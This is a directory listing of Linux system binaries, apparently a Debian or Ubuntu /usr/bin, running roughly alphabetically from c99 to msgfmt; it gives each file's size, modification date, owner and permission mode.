0.418 KB
November 18 2020 2:53:07
root
0755
c99
0.443 KB
November 18 2020 2:53:07
root
0755
c99-gcc
0.443 KB
November 18 2020 2:53:07
root
0755
c_rehash
6.8 KB
September 18 2025 8:06:16
root
0755
cal
36.945 KB
January 29 2022 5:12:54
root
0755
captoinfo
86.414 KB
May 17 2023 2:45:27
root
0755
cat
34.461 KB
February 08 2024 11:46:39
root
0755
catman
34.758 KB
March 18 2022 3:03:00
root
0755
cautious-launcher
0.833 KB
December 11 2021 7:14:00
root
0755
cc
906.82 KB
April 22 2025 11:28:20
root
0755
cgi-fcgi
18.148 KB
April 30 2025 4:57:03
root
0755
chage
70.492 KB
February 06 2024 8:54:23
root
2755
chattr
14.313 KB
October 09 2023 9:50:10
root
0755
chcon
58.508 KB
February 08 2024 11:46:39
root
0755
check-language-support
2.706 KB
December 29 2022 3:41:53
root
0755
checkgid
14.305 KB
August 11 2025 8:10:10
root
0755
chfn
71.008 KB
February 06 2024 8:54:23
root
4755
chgrp
54.508 KB
February 08 2024 11:46:39
root
0755
chmod
54.508 KB
February 08 2024 11:46:39
root
0755
choom
22.375 KB
April 09 2024 11:32:56
root
0755
chown
58.508 KB
February 08 2024 11:46:39
root
0755
chrt
26.375 KB
April 09 2024 11:32:56
root
0755
chsh
43.758 KB
February 06 2024 8:54:23
root
4755
chvt
14.227 KB
December 16 2022 10:14:33
root
0755
ckbcomp
146.306 KB
November 23 2021 12:39:53
root
0755
cksum
34.414 KB
February 08 2024 11:46:39
root
0755
clear
14.313 KB
May 17 2023 2:45:27
root
0755
clear_console
14.227 KB
March 14 2024 7:31:47
root
0755
cmp
42.391 KB
March 23 2022 9:50:34
root
0755
codepage
14.148 KB
December 16 2022 10:14:33
root
0755
col
22.383 KB
April 09 2024 11:32:56
root
0755
colcrt
14.383 KB
April 09 2024 11:32:56
root
0755
colrm
14.383 KB
April 09 2024 11:32:56
root
0755
column
34.383 KB
April 09 2024 11:32:56
root
0755
comm
34.516 KB
February 08 2024 11:46:39
root
0755
compose
18.058 KB
December 11 2021 7:14:00
root
0755
corelist
15.015 KB
July 26 2025 1:26:40
root
0755
corepack
0.17 KB
January 21 2025 2:00:50
root
0755
cp
138.508 KB
February 08 2024 11:46:39
root
0755
cpan
8.164 KB
July 26 2025 1:26:40
root
0755
cpan5.34-x86_64-linux-gnu
8.185 KB
July 26 2025 1:26:40
root
0755
cpio
141.641 KB
April 28 2024 8:30:36
root
0755
cpio-filter
1.221 KB
December 26 2020 12:44:35
root
0755
cpp
906.82 KB
April 22 2025 11:28:20
root
0755
cpp-11
906.82 KB
April 22 2025 11:28:20
root
0755
crc32
1.037 KB
March 14 2020 8:52:14
root
0755
crontab
38.641 KB
March 23 2022 9:49:13
root
2755
csplit
106.508 KB
February 08 2024 11:46:39
root
0755
ctstat
22.656 KB
March 24 2022 7:56:47
root
0755
curl
254.227 KB
September 23 2025 7:24:37
root
0755
cut
38.508 KB
February 08 2024 11:46:39
root
0755
cvtsudoers
296.398 KB
June 25 2025 8:48:23
root
0755
dash
122.742 KB
March 23 2022 9:49:23
root
0755
date
102.508 KB
February 08 2024 11:46:39
root
0755
dbus-cleanup-sockets
14.289 KB
October 25 2022 9:15:07
root
0755
dbus-daemon
227.32 KB
October 25 2022 9:15:07
root
0755
dbus-monitor
26.289 KB
October 25 2022 9:15:07
root
0755
dbus-run-session
14.289 KB
October 25 2022 9:15:07
root
0755
dbus-send
26.289 KB
October 25 2022 9:15:07
root
0755
dbus-update-activation-environment
14.289 KB
October 25 2022 9:15:07
root
0755
dbus-uuidgen
14.289 KB
October 25 2022 9:15:07
root
0755
dd
66.523 KB
February 08 2024 11:46:39
root
0755
deallocvt
14.227 KB
December 16 2022 10:14:33
root
0755
deb-systemd-helper
20.893 KB
December 08 2021 5:55:54
root
0755
deb-systemd-invoke
6.012 KB
February 16 2022 6:31:40
root
0755
debconf
2.792 KB
February 20 2022 10:42:49
root
0755
debconf-apt-progress
11.271 KB
February 20 2022 10:42:49
root
0755
debconf-communicate
0.594 KB
February 20 2022 10:42:49
root
0755
debconf-copydb
1.679 KB
February 20 2022 10:42:49
root
0755
debconf-escape
0.632 KB
February 20 2022 10:42:49
root
0755
debconf-gettextize
15.967 KB
December 30 2020 9:09:19
root
0755
debconf-set-selections
2.925 KB
February 20 2022 10:42:49
root
0755
debconf-show
1.784 KB
February 20 2022 10:42:49
root
0755
debconf-updatepo
4.459 KB
December 30 2020 9:09:19
root
0755
debian-distro-info
22.953 KB
November 28 2023 8:18:32
root
0755
debugedit
64.469 KB
March 23 2022 9:49:59
root
0755
delpart
14.375 KB
April 09 2024 11:32:56
root
0755
delv
45.32 KB
October 21 2025 9:15:59
root
0755
df
83.078 KB
February 08 2024 11:46:39
root
0755
dh
26.206 KB
February 07 2022 11:59:07
root
0755
dh_assistant
13.416 KB
February 07 2022 11:59:07
root
0755
dh_auto_build
1.374 KB
February 07 2022 11:59:07
root
0755
dh_auto_clean
1.513 KB
February 07 2022 11:59:07
root
0755
dh_auto_configure
1.628 KB
February 07 2022 11:59:07
root
0755
dh_auto_install
3.22 KB
February 07 2022 11:59:07
root
0755
dh_auto_test
1.654 KB
February 07 2022 11:59:07
root
0755
dh_autoreconf
6.459 KB
February 04 2021 7:26:25
root
0755
dh_autoreconf_clean
2.103 KB
February 04 2021 7:26:25
root
0755
dh_autotools-dev_restoreconfig
1.793 KB
January 31 2022 10:43:17
root
0755
dh_autotools-dev_updateconfig
1.807 KB
January 31 2022 10:43:17
root
0755
dh_bash-completion
4.311 KB
November 11 2021 11:41:52
root
0755
dh_bugfiles
3.582 KB
February 07 2022 11:59:07
root
0755
dh_builddeb
4.962 KB
February 07 2022 11:59:07
root
0755
dh_clean
5.028 KB
February 07 2022 11:59:07
root
0755
dh_compress
7.666 KB
February 07 2022 11:59:07
root
0755
dh_dwz
4.966 KB
February 07 2022 11:59:07
root
0755
dh_fixperms
5.295 KB
February 07 2022 11:59:07
root
0755
dh_gencontrol
5.879 KB
February 07 2022 11:59:07
root
0755
dh_icons
2.043 KB
February 07 2022 11:59:07
root
0755
dh_install
12.16 KB
February 07 2022 11:59:07
root
0755
dh_installalternatives
6.09 KB
February 07 2022 11:59:07
root
0755
dh_installcatalogs
3.334 KB
February 07 2022 11:59:07
root
0755
dh_installchangelogs
7.476 KB
February 07 2022 11:59:07
root
0755
dh_installcron
1.65 KB
February 07 2022 11:59:07
root
0755
dh_installdeb
13.311 KB
February 07 2022 11:59:07
root
0755
dh_installdebconf
3.211 KB
February 07 2022 11:59:07
root
0755
dh_installdirs
3.088 KB
February 07 2022 11:59:07
root
0755
dh_installdocs
14.648 KB
February 07 2022 11:59:07
root
0755
dh_installemacsen
3.738 KB
February 07 2022 11:59:07
root
0755
dh_installexamples
5.416 KB
February 07 2022 11:59:07
root
0755
dh_installgsettings
2.241 KB
February 07 2022 11:59:07
root
0755
dh_installifupdown
1.468 KB
February 07 2022 11:59:07
root
0755
dh_installinfo
3.379 KB
February 07 2022 11:59:07
root
0755
dh_installinit
13.934 KB
February 07 2022 11:59:07
root
0755
dh_installinitramfs
2.503 KB
February 07 2022 11:59:07
root
0755
dh_installlogcheck
1.936 KB
February 07 2022 11:59:07
root
0755
dh_installlogrotate
1.138 KB
February 07 2022 11:59:07
root
0755
dh_installman
13.203 KB
February 07 2022 11:59:07
root
0755
dh_installmanpages
4.895 KB
February 07 2022 11:59:07
root
0755
dh_installmenu
2.15 KB
February 07 2022 11:59:07
root
0755
dh_installmime
1.299 KB
February 07 2022 11:59:07
root
0755
dh_installmodules
2.657 KB
February 07 2022 11:59:07
root
0755
dh_installpam
1.134 KB
February 07 2022 11:59:07
root
0755
dh_installppp
1.379 KB
February 07 2022 11:59:07
root
0755
dh_installsystemd
14.061 KB
February 07 2022 11:59:07
root
0755
dh_installsystemduser
8.362 KB
February 07 2022 11:59:07
root
0755
dh_installsysusers
2.729 KB
February 07 2022 11:59:07
root
0755
dh_installtmpfiles
3.239 KB
February 07 2022 11:59:07
root
0755
dh_installudev
2.104 KB
February 07 2022 11:59:07
root
0755
dh_installwm
3.333 KB
February 07 2022 11:59:07
root
0755
dh_installxfonts
2.797 KB
February 07 2022 11:59:07
root
0755
dh_link
4.323 KB
February 07 2022 11:59:07
root
0755
dh_lintian
1.291 KB
February 07 2022 11:59:07
root
0755
dh_listpackages
0.806 KB
February 07 2022 11:59:07
root
0755
dh_makeshlibs
15.117 KB
February 07 2022 11:59:07
root
0755
dh_md5sums
3.439 KB
February 07 2022 11:59:07
root
0755
dh_missing
8.751 KB
February 07 2022 11:59:07
root
0755
dh_movefiles
4.688 KB
February 07 2022 11:59:07
root
0755
dh_perl
4.608 KB
February 07 2022 11:59:07
root
0755
dh_phpcomposer
3.008 KB
November 02 2021 4:45:14
root
0755
dh_phppear
5.631 KB
November 02 2021 4:45:14
root
0755
dh_prep
1.865 KB
February 07 2022 11:59:07
root
0755
dh_shlibdeps
6.235 KB
February 07 2022 11:59:07
root
0755
dh_strip
16.931 KB
February 07 2022 11:59:07
root
0755
dh_strip_nondeterminism
3.123 KB
December 21 2021 1:12:02
root
0755
dh_systemd_enable
9.045 KB
February 07 2022 11:59:07
root
0755
dh_systemd_start
8.569 KB
February 07 2022 11:59:07
root
0755
dh_testdir
1.306 KB
February 07 2022 11:59:07
root
0755
dh_testroot
2.905 KB
February 07 2022 11:59:07
root
0755
dh_ucf
2.375 KB
February 07 2022 11:59:07
root
0755
dh_update_autotools_config
1.844 KB
February 07 2022 11:59:07
root
0755
dh_usrlocal
4.2 KB
February 07 2022 11:59:07
root
0755
diff
130.547 KB
March 23 2022 9:50:34
root
0755
diff3
54.516 KB
March 23 2022 9:50:34
root
0755
dig
150.828 KB
October 21 2025 9:15:59
root
0755
dir
134.977 KB
February 08 2024 11:46:39
root
0755
dircolors
38.516 KB
February 08 2024 11:46:39
root
0755
dirmngr
433.016 KB
June 25 2025 9:54:28
root
0755
dirmngr-client
54.922 KB
June 25 2025 9:54:28
root
0755
dirname
30.383 KB
February 08 2024 11:46:39
root
0755
distro-info
22.891 KB
November 28 2023 8:18:32
root
0755
dmesg
70.609 KB
April 09 2024 11:32:56
root
0755
dnsdomainname
22.227 KB
March 23 2022 9:57:59
root
0755
do-release-upgrade
10.425 KB
September 10 2024 8:28:10
root
0755
domainname
22.227 KB
March 23 2022 9:57:59
root
0755
dpkg
310.688 KB
September 10 2025 4:09:16
root
0755
dpkg-architecture
13.508 KB
September 10 2025 4:09:16
root
0755
dpkg-buildflags
7.388 KB
September 10 2025 4:09:16
root
0755
dpkg-buildpackage
31.665 KB
September 10 2025 4:09:16
root
0755
dpkg-checkbuilddeps
7.445 KB
September 10 2025 4:09:16
root
0755
dpkg-deb
134.492 KB
September 10 2025 4:09:16
root
0755
dpkg-distaddfile
2.717 KB
September 10 2025 4:09:16
root
0755
dpkg-divert
118.492 KB
September 10 2025 4:09:16
root
0755
dpkg-genbuildinfo
16.705 KB
September 10 2025 4:09:16
root
0755
dpkg-genchanges
17.272 KB
September 10 2025 4:09:16
root
0755
dpkg-gencontrol
14.238 KB
September 10 2025 4:09:16
root
0755
dpkg-gensymbols
10.646 KB
September 10 2025 4:09:16
root
0755
dpkg-maintscript-helper
20.712 KB
September 10 2025 4:09:16
root
0755
dpkg-mergechangelogs
8.694 KB
September 10 2025 4:09:16
root
0755
dpkg-name
6.63 KB
September 10 2025 4:09:16
root
0755
dpkg-parsechangelog
4.831 KB
September 10 2025 4:09:16
root
0755
dpkg-query
138.523 KB
September 10 2025 4:09:16
root
0755
dpkg-realpath
4.091 KB
September 10 2025 4:09:16
root
0755
dpkg-scanpackages
8.501 KB
September 10 2025 4:09:16
root
0755
dpkg-scansources
8.959 KB
September 10 2025 4:09:16
root
0755
dpkg-shlibdeps
30.957 KB
September 10 2025 4:09:16
root
0755
dpkg-source
22.564 KB
September 10 2025 4:09:16
root
0755
dpkg-split
98.508 KB
September 10 2025 4:09:16
root
0755
dpkg-statoverride
46.258 KB
September 10 2025 4:09:16
root
0755
dpkg-trigger
42.406 KB
September 10 2025 4:09:16
root
0755
dpkg-vendor
3.186 KB
September 10 2025 4:09:16
root
0755
du
146.508 KB
February 08 2024 11:46:39
root
0755
dumpkeys
158.711 KB
December 16 2022 10:14:33
root
0755
dvipdf
0.983 KB
September 26 2025 12:42:27
root
0755
dwp
1.82 MB
December 03 2025 11:08:01
root
0755
dwz
212.758 KB
March 23 2022 9:51:21
root
0755
echo
34.305 KB
February 08 2024 11:46:39
root
0755
ed
54.492 KB
February 13 2022 7:08:51
root
0755
edit
18.058 KB
December 11 2021 7:14:00
root
0755
editor
276.523 KB
October 10 2024 9:39:30
root
0755
egrep
0.027 KB
March 23 2022 9:56:13
root
0755
eject
42.227 KB
April 09 2024 11:32:56
root
0755
elfedit
34.719 KB
December 03 2025 11:08:01
root
0755
enc2xs
40.839 KB
July 26 2025 1:26:40
root
0755
encguess
3.006 KB
July 26 2025 1:26:40
root
0755
env
42.945 KB
February 08 2024 11:46:39
root
0755
envsubst
34.375 KB
March 25 2022 6:31:07
root
0755
eps2eps
0.624 KB
September 26 2025 12:42:27
root
0755
eqn
188.445 KB
March 23 2022 9:56:30
root
0755
ex
3.61 MB
April 02 2025 8:39:01
root
0755
expand
34.531 KB
February 08 2024 11:46:39
root
0755
expiry
22.594 KB
February 06 2024 8:54:23
root
2755
expr
102.414 KB
February 08 2024 11:46:39
root
0755
factor
70.508 KB
February 08 2024 11:46:39
root
0755
faillog
22.594 KB
February 06 2024 8:54:23
root
0755
faked-sysv
30.391 KB
March 06 2022 4:33:00
root
0755
faked-tcp
30.383 KB
March 06 2022 4:33:00
root
0755
fakeroot
3.901 KB
March 06 2022 4:33:00
root
0755
fakeroot-sysv
3.901 KB
March 06 2022 4:33:00
root
0755
fakeroot-tcp
3.896 KB
March 06 2022 4:33:00
root
0755
fallocate
22.375 KB
April 09 2024 11:32:56
root
0755
false
26.305 KB
February 08 2024 11:46:39
root
0755
fcgistarter
14.305 KB
August 11 2025 8:10:10
root
0755
fgconsole
14.227 KB
December 16 2022 10:14:33
root
0755
fgrep
0.027 KB
March 23 2022 9:56:13
root
0755
file
26.563 KB
September 12 2023 1:59:06
root
0755
fincore
22.422 KB
April 09 2024 11:32:56
root
0755
find
275.477 KB
March 23 2022 9:52:12
root
0755
find-debuginfo
21.28 KB
March 23 2022 9:49:59
root
0755
findmnt
63.609 KB
April 09 2024 11:32:56
root
0755
flock
22.484 KB
April 09 2024 11:32:56
root
0755
fmt
38.508 KB
February 08 2024 11:46:39
root
0755
fold
34.508 KB
February 08 2024 11:46:39
root
0755
free
26.234 KB
October 31 2023 7:36:04
root
0755
ftp
178.898 KB
March 25 2022 6:01:15
root
0755
funzip
22.297 KB
February 01 2024 11:52:55
root
0755
fuser
39.313 KB
March 25 2022 12:29:37
root
0755
fusermount
34.375 KB
March 23 2022 9:53:14
root
4755
fusermount3
34.375 KB
March 23 2022 9:53:14
root
4755
g++
906.82 KB
April 22 2025 11:28:20
root
0755
g++-11
906.82 KB
April 22 2025 11:28:20
root
0755
gapplication
22.383 KB
June 20 2025 9:38:50
root
0755
gcc
906.82 KB
April 22 2025 11:28:20
root
0755
gcc-11
906.82 KB
April 22 2025 11:28:20
root
0755
gcc-ar
26.539 KB
April 22 2025 11:28:20
root
0755
gcc-ar-11
26.539 KB
April 22 2025 11:28:20
root
0755
gcc-nm
26.539 KB
April 22 2025 11:28:20
root
0755
gcc-nm-11
26.539 KB
April 22 2025 11:28:20
root
0755
gcc-ranlib
26.539 KB
April 22 2025 11:28:20
root
0755
gcc-ranlib-11
26.539 KB
April 22 2025 11:28:20
root
0755
gcov
400.008 KB
April 22 2025 11:28:20
root
0755
gcov-11
400.008 KB
April 22 2025 11:28:20
root
0755
gcov-dump
251.836 KB
April 22 2025 11:28:20
root
0755
gcov-dump-11
251.836 KB
April 22 2025 11:28:20
root
0755
gcov-tool
275.93 KB
April 22 2025 11:28:20
root
0755
gcov-tool-11
275.93 KB
April 22 2025 11:28:20
root
0755
gdbus
50.383 KB
June 20 2025 9:38:50
root
0755
gencat
26.367 KB
September 17 2025 11:26:08
root
0755
geqn
188.445 KB
March 23 2022 9:56:30
root
0755
getconf
34.289 KB
September 17 2025 11:26:08
root
0755
getent
38.648 KB
September 17 2025 11:26:08
root
0755
getkeycodes
14.227 KB
December 16 2022 10:14:33
root
0755
getopt
22.375 KB
April 09 2024 11:32:56
root
0755
gettext
34.375 KB
March 25 2022 6:31:07
root
0755
gettext.sh
5.066 KB
March 25 2022 6:31:07
root
0755
gettextize
41.277 KB
March 25 2022 6:31:07
root
0755
ghostscript
14.148 KB
September 26 2025 12:42:27
root
0755
ginstall-info
103.227 KB
February 06 2022 8:48:45
root
0755
gio
90.398 KB
June 20 2025 9:38:50
root
0755
gio-querymodules
14.305 KB
June 20 2025 9:38:50
root
0755
git
3.54 MB
July 10 2025 3:46:10
root
0755
git-receive-pack
3.54 MB
July 10 2025 3:46:10
root
0755
git-shell
552.578 KB
July 10 2025 3:46:10
root
0755
git-upload-archive
3.54 MB
July 10 2025 3:46:10
root
0755
git-upload-pack
3.54 MB
July 10 2025 3:46:10
root
0755
glib-compile-schemas
50.305 KB
June 20 2025 9:38:50
root
0755
gmake
249.703 KB
February 15 2022 11:32:21
root
0755
gold
3.04 MB
December 03 2025 11:08:01
root
0755
gpasswd
70.383 KB
February 06 2024 8:54:23
root
4755
gpg
1 MB
June 25 2025 9:54:28
root
0755
gpg-agent
312.961 KB
June 25 2025 9:54:28
root
0755
gpg-connect-agent
82.992 KB
June 25 2025 9:54:28
root
0755
gpg-wks-server
115.055 KB
June 25 2025 9:54:28
root
0755
gpg-zip
3.434 KB
June 25 2025 9:54:28
root
0755
gpgcompose
496.484 KB
June 25 2025 9:54:28
root
0755
gpgconf
126.734 KB
June 25 2025 9:54:28
root
0755
gpgparsemail
34.375 KB
June 25 2025 9:54:28
root
0755
gpgsm
418.898 KB
June 25 2025 9:54:28
root
0755
gpgsplit
26.547 KB
June 25 2025 9:54:28
root
0755
gpgtar
63.391 KB
June 25 2025 9:54:28
root
0755
gpgv
271.039 KB
June 25 2025 9:54:28
root
0755
gpic
200.039 KB
March 23 2022 9:56:30
root
0755
gprof
111.789 KB
December 03 2025 11:08:01
root
0755
grep
178.445 KB
March 23 2022 9:56:13
root
0755
gresource
22.305 KB
June 20 2025 9:38:50
root
0755
groff
94.5 KB
March 23 2022 9:56:30
root
0755
grog
2.711 KB
March 23 2022 9:56:30
root
0755
grops
162.555 KB
March 23 2022 9:56:30
root
0755
grotty
118.523 KB
March 23 2022 9:56:30
root
0755
groups
34.508 KB
February 08 2024 11:46:39
root
0755
grub-editenv
376.953 KB
December 19 2022 5:21:26
root
0755
grub-file
816.453 KB
December 19 2022 5:21:26
root
0755
grub-fstest
937.922 KB
December 19 2022 5:21:26
root
0755
grub-glue-efi
247.859 KB
December 19 2022 5:21:26
root
0755
grub-kbdcomp
1.642 KB
December 19 2022 5:21:26
root
0755
grub-menulst2cfg
228.125 KB
December 19 2022 5:21:26
root
0755
grub-mkfont
272.422 KB
December 19 2022 5:21:26
root
0755
grub-mkimage
361.047 KB
December 19 2022 5:21:26
root
0755
grub-mklayout
252.172 KB
December 19 2022 5:21:26
root
0755
grub-mknetdir
417.656 KB
December 19 2022 5:21:26
root
0755
grub-mkpasswd-pbkdf2
256.203 KB
December 19 2022 5:21:26
root
0755
grub-mkrelpath
247.578 KB
December 19 2022 5:21:26
root
0755
grub-mkrescue
998.469 KB
December 19 2022 5:21:26
root
0755
grub-mkstandalone
493.953 KB
December 19 2022 5:21:26
root
0755
grub-mount
760.844 KB
December 19 2022 5:21:26
root
0755
grub-ntldr-img
38.242 KB
December 19 2022 5:21:26
root
0755
grub-render-label
828.828 KB
December 19 2022 5:21:26
root
0755
grub-script-check
275.703 KB
December 19 2022 5:21:26
root
0755
grub-syslinux2cfg
781.344 KB
December 19 2022 5:21:26
root
0755
gs
14.148 KB
September 26 2025 12:42:27
root
0755
gsbj
0.342 KB
September 26 2025 12:42:27
root
0755
gsdj
0.344 KB
September 26 2025 12:42:27
root
0755
gsdj500
0.344 KB
September 26 2025 12:42:27
root
0755
gsettings
30.305 KB
June 20 2025 9:38:50
root
0755
gslj
0.345 KB
September 26 2025 12:42:27
root
0755
gslp
0.342 KB
September 26 2025 12:42:27
root
0755
gsnd
0.271 KB
September 26 2025 12:42:27
root
0755
gtbl
126.477 KB
March 23 2022 9:56:30
root
0755
gunzip
2.291 KB
September 05 2022 9:33:59
root
0755
gzexe
6.296 KB
September 05 2022 9:33:59
root
0755
gzip
91.234 KB
September 05 2022 9:33:59
root
0755
h2ph
28.542 KB
July 26 2025 1:26:40
root
0755
h2xs
59.506 KB
July 26 2025 1:26:40
root
0755
hardlink
34.43 KB
April 09 2024 11:32:56
root
0755
hd
50.391 KB
April 09 2024 11:32:56
root
0755
head
42.508 KB
February 08 2024 11:46:39
root
0755
helpztags
2.455 KB
August 27 2024 1:29:41
root
0755
hexdump
50.391 KB
April 09 2024 11:32:56
root
0755
host
118.82 KB
October 21 2025 9:15:59
root
0755
hostid
30.508 KB
February 08 2024 11:46:39
root
0755
hostname
22.227 KB
March 23 2022 9:57:59
root
0755
hostnamectl
30.375 KB
June 04 2025 10:17:43
root
0755
htcacheclean
38.313 KB
August 11 2025 8:10:10
root
0755
htdbm
26.305 KB
August 11 2025 8:10:10
root
0755
htdigest
14.305 KB
August 11 2025 8:10:10
root
0755
htpasswd
26.305 KB
August 11 2025 8:10:10
root
0755
hwe-support-status
10.576 KB
July 11 2024 5:48:43
root
0755
i386
26.648 KB
April 09 2024 11:32:56
root
0755
i686-linux-gnu-pkg-config
2.183 KB
March 25 2022 12:22:42
root
0755
ibd2sdi
294.742 KB
October 24 2025 9:49:40
root
0755
iconv
66.406 KB
September 17 2025 11:26:08
root
0755
id
38.508 KB
February 08 2024 11:46:39
root
0755
ifnames
4.085 KB
August 23 2021 11:33:47
root
0755
info
301.742 KB
February 06 2022 8:48:45
root
0755
infobrowser
301.742 KB
February 06 2022 8:48:45
root
0755
infocmp
62.375 KB
May 17 2023 2:45:27
root
0755
infotocap
86.414 KB
May 17 2023 2:45:27
root
0755
innochecksum
199.391 KB
October 24 2025 9:49:40
root
0755
install
142.523 KB
February 08 2024 11:46:39
root
0755
install-info
103.227 KB
February 06 2022 8:48:45
root
0755
instmodsh
4.271 KB
July 26 2025 1:26:40
root
0755
ionice
18.375 KB
April 09 2024 11:32:56
root
0755
ip
702.047 KB
March 24 2022 7:56:47
root
0755
ipcmk
22.445 KB
April 09 2024 11:32:56
root
0755
ipcrm
18.375 KB
April 09 2024 11:32:56
root
0755
ipcs
38.375 KB
April 09 2024 11:32:56
root
0755
iptables-xml
96.945 KB
January 17 2024 5:14:30
root
0755
ischroot
14.195 KB
March 23 2022 9:49:54
root
0755
ispell-wrapper
7.053 KB
December 03 2021 12:03:03
root
0755
join
46.547 KB
February 08 2024 11:46:39
root
0755
journalctl
78.391 KB
June 04 2025 10:17:43
root
0755
json_pp
4.875 KB
July 26 2025 1:26:40
root
0755
kbd_mode
14.523 KB
December 16 2022 10:14:33
root
0755
kbdinfo
18.227 KB
December 16 2022 10:14:33
root
0755
kbxutil
62.828 KB
June 25 2025 9:54:28
root
0755
kernel-install
4.787 KB
March 11 2022 8:48:49
root
0755
keyring
0.938 KB
January 02 2022 10:55:06
root
0755
kill
30.227 KB
October 31 2023 7:36:04
root
0755
killall
31.344 KB
March 25 2022 12:29:37
root
0755
kmod
166.359 KB
August 17 2021 5:19:53
root
0755
laptop-detect
3.73 KB
August 12 2017 11:24:53
root
0755
last
34.375 KB
April 09 2024 11:32:56
root
0755
lastb
34.375 KB
April 09 2024 11:32:56
root
0755
lastlog
27.625 KB
February 06 2024 8:54:23
root
0755
lcf
7.602 KB
June 16 2020 1:37:53
root
0755
ld
1.66 MB
December 03 2025 11:08:01
root
0755
ld.bfd
1.66 MB
December 03 2025 11:08:01
root
0755
ld.gold
3.04 MB
December 03 2025 11:08:01
root
0755
ldd
5.316 KB
September 17 2025 11:26:08
root
0755
less
194.383 KB
April 28 2024 4:32:45
root
0755
lessecho
14.313 KB
April 28 2024 4:32:45
root
0755
lessfile
8.835 KB
December 29 2021 3:39:40
root
0755
lesskey
23.703 KB
April 28 2024 4:32:45
root
0755
lesspipe
8.835 KB
December 29 2021 3:39:40
root
0755
lexgrog
99.75 KB
March 18 2022 3:03:00
root
0755
libnetcfg
15.408 KB
July 26 2025 1:26:40
root
0755
libtoolize
128.261 KB
March 25 2022 12:13:52
root
0755
link
30.508 KB
February 08 2024 11:46:39
root
0755
linux-boot-prober
1.54 KB
July 11 2021 10:43:50
root
0755
linux-check-removal
3.994 KB
February 27 2025 3:59:00
root
0755
linux-update-symlinks
6.172 KB
February 27 2025 3:59:00
root
0755
linux-version
2.635 KB
November 13 2024 8:23:42
root
0755
linux32
26.648 KB
April 09 2024 11:32:56
root
0755
linux64
26.648 KB
April 09 2024 11:32:56
root
0755
ln
58.508 KB
February 08 2024 11:46:39
root
0755
lnstat
22.656 KB
March 24 2022 7:56:47
root
0755
loadkeys
198.758 KB
December 16 2022 10:14:33
root
0755
loadunimap
30.32 KB
December 16 2022 10:14:33
root
0755
locale
57.563 KB
September 17 2025 11:26:08
root
0755
locale-check
14.148 KB
September 10 2024 7:18:05
root
0755
localectl
26.367 KB
June 04 2025 10:17:43
root
0755
localedef
326.961 KB
September 17 2025 11:26:08
root
0755
logger
34.969 KB
April 09 2024 11:32:56
root
0755
login
51.734 KB
February 06 2024 8:54:23
root
0755
loginctl
58.484 KB
June 04 2025 10:17:43
root
0755
logname
30.508 KB
February 08 2024 11:46:39
root
0755
logresolve
14.313 KB
August 11 2025 8:10:10
root
0755
look
18.383 KB
April 09 2024 11:32:56
root
0755
lowntfs-3g
114.977 KB
November 01 2022 7:56:19
root
0755
ls
134.977 KB
February 08 2024 11:46:39
root
0755
lsattr
14.313 KB
October 09 2023 9:50:10
root
0755
lsb_release
3.553 KB
August 26 2019 5:11:20
root
0755
lsblk
122.383 KB
April 09 2024 11:32:56
root
0755
lscpu
98.375 KB
April 09 2024 11:32:56
root
0755
lshw
901.195 KB
March 25 2022 12:22:53
root
0755
lsinitramfs
0.689 KB
March 19 2024 8:05:17
root
0755
lsipc
50.375 KB
April 09 2024 11:32:56
root
0755
lslocks
30.703 KB
April 09 2024 11:32:56
root
0755
lslogins
50.375 KB
April 09 2024 11:32:56
root
0755
lsmem
34.375 KB
April 09 2024 11:32:56
root
0755
lsmod
166.359 KB
August 17 2021 5:19:53
root
0755
lsns
38.383 KB
April 09 2024 11:32:56
root
0755
lsof
163.617 KB
March 25 2022 12:16:24
root
0755
lspci
92.078 KB
August 30 2021 10:45:58
root
0755
lspgpot
1.056 KB
August 28 2017 6:22:54
root
0755
lsusb
246.516 KB
March 25 2022 5:53:09
root
0755
lto-dump-11
23.73 MB
April 22 2025 11:28:20
root
0755
ltrace
269.195 KB
January 15 2024 6:45:25
root
0755
lzcat
82.523 KB
April 08 2022 8:51:38
root
0755
lzcmp
6.858 KB
April 08 2022 8:51:38
root
0755
lzdiff
6.858 KB
April 08 2022 8:51:38
root
0755
lzegrep
5.874 KB
April 08 2022 8:51:38
root
0755
lzfgrep
5.874 KB
April 08 2022 8:51:38
root
0755
lzgrep
5.874 KB
April 08 2022 8:51:38
root
0755
lzless
1.757 KB
April 08 2022 8:51:38
root
0755
lzma
82.523 KB
April 08 2022 8:51:38
root
0755
lzmainfo
14.227 KB
April 08 2022 8:51:38
root
0755
lzmore
2.111 KB
April 08 2022 8:51:38
root
0755
m4
154.367 KB
March 25 2022 12:25:25
root
0755
make
249.703 KB
February 15 2022 11:32:21
root
0755
make-first-existing-target
4.79 KB
February 15 2022 11:32:21
root
0755
man
117.68 KB
March 18 2022 3:03:00
root
0755
man-recode
35.68 KB
March 18 2022 3:03:00
root
0755
mandb
139.938 KB
March 18 2022 3:03:00
root
0755
manpath
30.781 KB
March 18 2022 3:03:00
root
0755
mapscrn
30.32 KB
December 16 2022 10:14:33
root
0755
mawk
154.789 KB
January 24 2022 5:57:23
root
0755
mcookie
26.445 KB
April 09 2024 11:32:56
root
0755
md5sum
42.414 KB
February 08 2024 11:46:39
root
0755
md5sum.textutils
42.414 KB
February 08 2024 11:46:39
root
0755
mdig
50.398 KB
October 21 2025 9:15:59
root
0755
memusage
7.32 KB
September 17 2025 11:26:08
root
0755
memusagestat
22.367 KB
September 17 2025 11:26:08
root
0755
mesg
14.375 KB
April 09 2024 11:32:56
root
0755
migrate-pubring-from-classic-gpg
2.988 KB
December 19 2021 5:45:14
root
0755
mk_modmap
15.784 KB
December 16 2022 10:14:33
root
0755
mkdir
66.508 KB
February 08 2024 11:46:39
root
0755
mkfifo
38.508 KB
February 08 2024 11:46:39
root
0755
mknod
42.508 KB
February 08 2024 11:46:39
root
0755
mktemp
38.508 KB
February 08 2024 11:46:39
root
0755
mlock
14.148 KB
December 01 2021 7:15:50
root
2755
more
42.383 KB
April 09 2024 11:32:56
root
0755
mount
46.375 KB
April 09 2024 11:32:56
root
4755
mountpoint
18.375 KB
April 09 2024 11:32:56
root
0755
msgattrib
26.375 KB
March 25 2022 6:31:07
root
0755
msgcat
26.375 KB
March 25 2022 6:31:07
root
0755
msgcmp
26.375 KB
March 25 2022 6:31:07
root
0755
msgcomm
26.375 KB
March 25 2022 6:31:07
root
0755
msgconv
22.375 KB
March 25 2022 6:31:07
root
0755
msgen
22.375 KB
March 25 2022 6:31:07
root
0755
msgexec
22.375 KB
March 25 2022 6:31:07
root
0755
msgfilter
34.375 KB
March 25 2022 6:31:07
root
0755
msgfmt
82.594 KB
